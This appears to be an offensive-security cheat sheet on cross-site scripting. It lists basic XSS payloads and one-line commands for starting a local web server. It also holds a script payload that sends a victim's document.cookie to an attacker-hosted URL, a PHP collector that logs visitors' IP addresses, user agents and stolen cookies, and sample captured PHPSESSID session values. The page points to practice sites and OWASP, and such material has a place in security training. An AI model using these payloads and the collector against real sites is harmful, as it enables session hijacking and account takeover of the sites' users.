⚔️XSS Attacks

XSS Attacks

Only Works when website is not HTTPOnly

XSS Scripts

Basic XSS Payloads

</b><img src=x onerror=alert(document.domain)></img><b> </b><script>alert(document.domain)</script><b>

Open local File Server

Open local File server Using PHP

php -S 0.0.0.0:80

Open local File server Using PHP

python3 -m http.server 80

Get Cookies As Request

Script Used in Attacker System for hosting

/*
PAYLOAD to be used : 

<script> var i = new Image(); i.src="http://<url_where_this_script_is_placed>/get-data.php?cookie="+escape(document.cookie)</script>
*/

<?php

$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_Server['HTTP_USER_AGENT'];

$fp = fopen('gathered_info.txt', 'a');

fwrite($fp, $ip.' '.$browser." \\n");
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])." \\n\\n");
fclose($fp);
?>

Strings(Cookie requests) Stored in gathered_info.txt File

192.168.99.100  
cookie=PHPSESSID=3udrbq5j2km5spea10bu7lri07 

192.168.99.11  
cookie=PHPSESSID=il99fdtjli5mq8lvm7k6r07hd0 

192.168.99.100  
cookie=PHPSESSID=il99fdtjli5mq8lvm7k6r07hd0 

192.168.99.11  
cookie=PHPSESSID=dte29r9stjinkki7hlgt3iqe54 

192.168.99.11  
cookie=PHPSESSID=vkhfn0hno94cpg84m0elb7d1d2

Other Resources

Websites to practice XSS attacks:

[1] hack.me

Resources:

[1] The Web Application Hacker's Handbook
[2] OWASP - XSS